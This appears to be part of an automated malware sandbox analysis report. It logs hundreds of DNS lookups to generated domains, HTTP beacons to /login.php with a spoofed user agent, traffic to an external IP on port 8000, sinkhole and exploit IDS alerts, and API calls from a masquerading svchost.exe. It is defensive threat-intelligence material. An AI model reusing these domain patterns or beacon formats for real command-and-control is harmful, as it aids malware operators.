Source: unknown	DNS traffic detected: query: qeqytup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufywil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatycyb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqycos.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxyxyd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowygem.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqypew.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyhil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyfow.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegysyg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegylep.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyvep.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahynaz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexykaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygyfir.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacycus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumycug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyxyq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyriz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galycuw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofymem.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrymuj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyfav.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvyxyj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykysix.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojycif.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymyjon.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyxug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvymej.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocypyt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyqil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvygyq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvydov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujyteq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymyfoj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopydum.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyros.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvytuj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekykev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujymel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyfog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvybeg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupyjuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujydag.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyxip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonybat.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopymyc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopygat.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojybek.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyrys.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygyvar.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexytep.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufydul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyviw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysynur.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadyquz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzylol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojyquf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puryxag.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymytar.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymytux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetykol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocygyk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysynaj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedytul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahydyb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqykus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujywiv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyrov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumyxiv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopyqim.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufycol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymyner.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryxen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocyqaf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumylel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyzuz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufytev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumytol.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volykyc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volyrac.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupybul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyfaz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysyxux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyzez.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupyxup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymywaj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocyruk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykyxur.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyroh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetysal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyhys.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyhuh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzyciq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowyrym.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purypyq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysylej.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofypuk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galykiz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujyjup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacynow.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqynel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymysud.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puryxuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyzeb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxywij.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purybav.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufymoq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volygyf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumyxep.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyvop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzywel.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyvav.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupylaq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebyteg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumypyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzymig.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujyjav.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvytan.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvymir.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galydoz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymylij.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyqob.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygysij.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pupyboq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowypek.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvyjox.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymyxex.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujycov.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gacyfew.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purymuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purylup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofyjuk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetynev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxygud.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetysuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygysen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrywax.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopydek.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqysuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykyjad.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygyged.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyfil.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyraw.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygyjuj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygymoj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygymyn.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryfox.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqypiz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvywup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganynyb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvyguj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galykes.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojypuc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocykif.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvytag.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyqyv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopycyf.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvywav.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufyxug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedykiv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygylax.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojyzyt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysyger.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexylal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekylag.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufypeg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvynen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvywux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volyquk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegyqug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvyvix.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygyfex.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzydal.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyfes.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysyjid.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofyzym.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyqop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvysur.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadydas.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvyxeq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysyfin.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volycik.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonykuk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxylux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojydam.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufybop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyrot.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzywuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrysyj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyxiq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygytyd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyvig.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopybok.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyleq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volybec.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetylip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocybam.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumydoq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyvoz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyfyz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volyjok.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqydus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyreh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyxyp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyloq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymysan.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofydut.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyxeg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygyxun.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojymet.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofybic.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahydoh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryvur.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufylap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyfeg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadykos.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvylyg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekytyq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyzub.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvypul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykyfen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvycip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumygyp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxytex.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofyref.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebykap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqydeb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxysun.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyryl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegynuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purylev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykylan.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyzac.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymygyx.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowyzam.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocyquc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekynuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyrez.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopypif.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyket.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufygav.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganypeb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzymev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyvew.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujylog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxyvoj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygygin.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatykow.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyreq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykywid.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volyjym.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygynox.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedynul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebylug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopyzuc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowyqoc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowycut.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexynyp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocykem.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojygut.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyqup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyheh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujybyq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxymin.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzyguv.com replaycode: Name error (3)

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 58882
Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 58882
Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 58882
Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 58882
Source: unknown	Network traffic detected: HTTP traffic on port 64583 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 64583

Source: unknown

Network traffic detected: DNS query count 1003

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02C83D90 IsUserAnAdmin,IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,

2_2_02C83D90

Source: global traffic

TCP traffic: 192.168.2.6:58882 -> 106.15.232.163:8000

Source: global traffic

DNS traffic detected: number of DNS queries: 1003

Source: Joe Sandbox View	IP Address: 3.94.10.34 3.94.10.34
Source: Joe Sandbox View	IP Address: 64.190.63.136 64.190.63.136

Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.6:49711
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.6:49711
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.6:49708
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.6:49708
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.6:58874
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.6:58874
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.6:52002
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.6:52002
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.6:62044
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:56242

Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
